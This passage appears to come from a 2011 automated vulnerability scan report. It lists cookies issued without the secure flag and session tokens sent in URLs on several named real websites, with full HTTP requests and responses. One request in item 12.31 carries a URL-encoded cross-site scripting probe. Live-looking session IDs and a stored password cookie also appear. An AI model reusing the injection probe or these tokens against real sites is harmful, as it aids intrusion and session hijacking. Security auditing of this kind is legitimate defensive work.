Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
12.23. https://secure.trust-guard.com/ResetPassword.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ResetPassword.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.trust-guard.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:00:02 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=810ck8u50d3r715ut9f1d8tvf2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
12.24. https://support.comodo.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.comodo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.comodo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:47:08 GMT
Server: Apache
Set-Cookie: SWIFT_sessionid40=3cdw2l8ir5jntocrfhfyvrg8o00usui3; path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Comodo - Kayako SupportSuite Help Desk Software</title>
<meta http-equiv=
...[SNIP]...
12.25. https://support.trust-guard.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/index.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:58:36 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_sessionid40=6wpcfc08xikijf34l3vxhi68m4979l9c; path=/
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 14136


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
12.26. https://support.trust-guard.com/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /index.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php?loginresult=-5&group=default&_m=tickets&_a=submit HTTP/1.1
Host: support.trust-guard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SWIFT_loginpassword=DErwC5IL14LhnSqA7IFm011b3Yjo0HD7Sizs0xht1wo%3D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_loginemail=deleted; SWIFT_sessionid40=dwygqqtavu1d244w838kq6z6jm9eea2r; __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9;

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:36:22 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; expires=Tue, 24-Apr-2012 19:36:23 GMT; path=/
Set-Cookie: SWIFT_sessionid40=deleted; expires=Sun, 25-Apr-2010 19:36:26 GMT; path=/
Set-Cookie: SWIFT_sessionid40=6z07f147s5rhj37palvjs6av8ek7h9dy; path=/
Connection: close
Content-Type: text/html
Content-Length: 14166


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-e
...[SNIP]...
12.27. https://support.trust-guard.com/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:08:52 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_sessionid40=15yhwgyyrywfvi1oedn98l4yai6tko82; path=/
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 14136


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
12.28. https://support.trust-guard.com/visitor/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /visitor/index.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email= HTTP/1.1
Referer: https://support.trust-guard.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:59:15 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Cache-Control: max-age=3600, must-revalidate
Expires: Tue, 26 Apr 2011 18:59:16 GMT
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_visitor=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; path=/
Set-Cookie: SWIFT_sessionid80=d6s5jfqcgng25ic49cjgklsipk7trq7w; path=/
Set-Cookie: SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; path=/
Content-Type: text/javascript
Content-Length: 11516

//===============================
// Kayako LiveResponse
// Copyright (c) 2001-2011
// http://www.kayako.com
// License: http://www.kayako.com/license.txt
//===============================

var sessio
...[SNIP]...
12.29. https://www.fusionvm.com/FusionVM/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.fusionvm.com
Path:   /FusionVM/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FusionVM/ HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: CriticalWatch_WinMgmt=a623626d-8fc7-42a5-b103-e9b75ad79594; expires=Mon, 25-Apr-2011 13:19:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=z4su31o2100elwiksplqkftw; path=/; HttpOnly
Date: Mon, 25 Apr 2011 12:54:52 GMT
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.fusionvm.com/FusionVM/DesktopDefault.aspx">here</a>.</h2>
</body></html>
12.30. https://checkout.netsuite.com/s  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

HEAD /s HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: netsparker/check
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=G4QzN1GchdfPr9rBJblBVPSQ5Jt63Zmb6JGBswSzDh2vP1LYSpzFqQ8ySNfk1fymwpy48cGyMdHsh0Qm2hgLvMGK1fgWxg2xsZBXTmhKB8Q22BrCVLQTv4mvdvnrtvGT!-1220802186; NLVisitorId=rcHW8495AXQCDpzW; NLShopperId=rcHW8495AYQCDmZk; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:26:37 GMT
Server: Apache
Location: http://shopping.netsuite.com/s.nl?alias=s&c=438708&n=1
Expires: 0
NS_RTIMER_COMPOSITE: 668885514:616363742D6A6176613031312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId=rcHW8495AYQCDmZk; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:38 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
NLRedirectReason: redirect to shopping server for shopping requests
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8

12.31. https://customer.kronos.com/Default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /Default.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.asp?nsextt=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000003%2529%253C%252Fscript%253E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: customer.kronos.com
Cookie: ICRedirect=Url=nsextt%3D%27%2522%2D%2D%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Enetsparker%280x000002%29%253C%2Fscript%253E; KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=FKMMPBCAJIEPPLMFHLPCHMNK
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=nsextt%3D%252527%252522%2D%2D%25253E%25253C%25252Fstyle%25253E%25253C%25252Fscript%25253E%25253Cscript%25253Enetsparker%2525280x000003%252529%25253C%25252Fscript%25253E; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
12.32. https://customer.kronos.com/user/forgotpassword.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/forgotpassword.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/forgotpassword.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13005
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
12.33. https://customer.kronos.com/user/forgotusername.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/forgotusername.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/forgotusername.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13247
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
12.34. https://customer.kronos.com/user/logindenied.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/logindenied.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/logindenied.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
Referer: https://customer.kronos.com/Default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16169
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
12.35. https://support.comodo.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.comodo.com
Path:   /index.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /index.php HTTP/1.1
Host: support.comodo.com
Connection: keep-alive
Referer: https://support.comodo.com/
Cache-Control: max-age=0
Origin: https://support.comodo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWIFT_sessionid40=1g4f03q2uixdg6t4rvkbe9weba00vg2a
Content-Length: 70

loginemail=&loginpassword=&Submit2=Login&_m=core&_a=login&querystring=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:47:50 GMT
Server: Apache
Set-Cookie: SWIFT_loginemail=deleted; expires=Sun, 25-Apr-2010 19:47:49 GMT; path=/
Set-Cookie: SWIFT_loginpassword=deleted; expires=Sun, 25-Apr-2010 19:47:49 GMT; path=/
Content-Length: 917
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Refresh" content="1; URL=index.php?loginresult=-5&amp;group=comodo">

<!-- default s
...[SNIP]...
12.36. https://support.comodo.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.comodo.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?loginresult=-5&group=comodo HTTP/1.1
Host: support.comodo.com
Connection: keep-alive
Referer: https://support.comodo.com/index.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWIFT_sessionid40=1g4f03q2uixdg6t4rvkbe9weba00vg2a

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:48:25 GMT
Server: Apache
Set-Cookie: SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%223%22%3B%7D; expires=Tue, 24-Apr-2012 19:48:25 GMT; path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 32488

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Comodo - Kayako SupportSuite Help Desk Software</title>
<meta http-equiv=
...[SNIP]...
12.37. https://support.trust-guard.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /index.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /index.php HTTP/1.1
Referer: https://support.trust-guard.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 84

_a=login&_m=core&loginemail=&loginpassword=&querystring=&rememberme=1&Submit2=Log+in

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:59:16 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_loginemail=deleted; expires=Sun, 25-Apr-2010 18:59:16 GMT; path=/
Set-Cookie: SWIFT_loginpassword=deleted; expires=Sun, 25-Apr-2010 18:59:16 GMT; path=/
Set-Cookie: SWIFT_loginemail=deleted; expires=Sun, 25-Apr-2010 18:59:16 GMT; path=/
Set-Cookie: SWIFT_loginpassword=DErwC5IL14LhnSqA7IFm011b3Yjo0HD7Sizs0xht1wo%3D; expires=Tue, 24-Apr-2012 18:59:16 GMT; path=/
Content-Type: text/html
Content-Length: 929

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Refresh" content="1; URL=index.php?loginresult=-5&amp;group=default">

<!-- default
...[SNIP]...
12.38. https://support.trust-guard.com/visitor/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/ HTTP/1.1
Referer: https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:59:13 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_visitor=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; path=/
Content-Type: text/html
Content-Length: 0

13. Session token in URL  previous  next
There are 11 instances of this issue:

13.1. http://173.46.7.45/SightMaxAgentInterface/agentinterfacejsonp.svc/site/AddPageToVisitorAgentSession  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://173.46.7.45
Path:   /SightMaxAgentInterface/agentinterfacejsonp.svc/site/AddPageToVisitorAgentSession

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /SightMaxAgentInterface/agentinterfacejsonp.svc/site/AddPageToVisitorAgentSession?callback=jsonp1303758910797&accountDataBaseID=1&websiteDataBaseID=13&browserID=5dd345ac-ed22-4b2b-853e-dbfa145a8ba3&sessionID=9e065146-0b55-4772-8638-739611076c8a&isSecureConnection=false&screenResolution=1920x1200x16&newPage=http%3A%2F%2Fhostpapasupport.com%2F&referrer=&pageTitle=HostPapa+-+Powered+By+Kayako+SupportSuite&cookies=SWIFT_sessionid40%3Drfuntjbhsxd8ck2zcoibakug2qhndlm9%3B+SWIFT_client%3Da%253A1%253A%257Bs%253A7%253A%2522groupid%2522%253Bs%253A1%253A%25221%2522%253B%257D&queryString= HTTP/1.1
Host: 173.46.7.45
Proxy-Connection: keep-alive
Referer: http://hostpapasupport.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SmartMaxUser=5dd345ac-ed22-4b2b-853e-dbfa145a8ba3; SmartMaxSession=9e065146-0b55-4772-8638-739611076c8a

Response

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 19:44:34 GMT
Content-Length: 64

jsonp1303758910797( {"AddPageToVisitorAgentSessionResult":10} );
13.2. http://173.46.7.45/SightMaxAgentInterface/agentinterfacejsonp.svc/site/GetVisitorAgentSessionMonitorCommand  previous  next

Summary
